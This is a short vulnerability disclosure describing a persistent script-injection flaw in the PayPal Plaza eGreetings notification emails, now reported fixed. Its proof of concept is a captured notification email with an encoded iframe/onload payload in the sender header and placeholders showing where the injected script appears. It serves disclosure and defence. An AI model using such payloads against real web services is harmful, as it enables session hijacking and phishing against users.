The Vulnerability Laboratory Research Team discovered a persistent input validation Vulnerability in the official Paypal Plaza website application.
The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the paypal plaza egreetings web service. The vulnerability is located in the (Step 5 Preview) eGreeting module notification with the bound vulnerable your name and recipient’s name parameters.
The vulnerability can be exploited by remote attackers with low or medium required user interaction and without privileged Customer/Pro/Seller account. Successful exploitation of the vulnerability can lead to session hijacking (customers),account steal via persistent web attacks, persistent phishing or stable (persistent) mail notification context manipulation.
Proof of Concept:
=================
The persistent input validation vulnerability can be exploited by remote attackers with low or medium required user inter action.
For demonstration or reproduce ...
Review: Notification Mail - eGreetings Card Notification
<html>
<head>
<title>You have received a eCard from your loved one.</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>
You have received a eCard from your loved one.</td></tr><tr><td><b>Von: </b>=?utf-8?B?Ij48aWZyYW1lIHNyYz1hIG9ubG9hZD1hbGVydCgiSEkiKSA8?=
<admin@vulnerability-lab.com></td></tr><tr><td><b>Datum: </b>14.08.2012 05:15</td></tr></table><table border=0 cellspacing=0
cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>research@vulnerability-lab.com</td></tr></table><br>
Dear "><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") <,<br/><br/>
Greetings! "><"><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") < has just sent you a eCard.
<br/><br/>
<a href="https://www.paypal-plaza.com/giftcard/2494/lang/en_au">View your eCard now.</a>
</body>
</html>
The security risk of the persistent input validation vulnerability in the mail notification service filter is estimated as medium. The vulnerability has been fixed by Paypal now.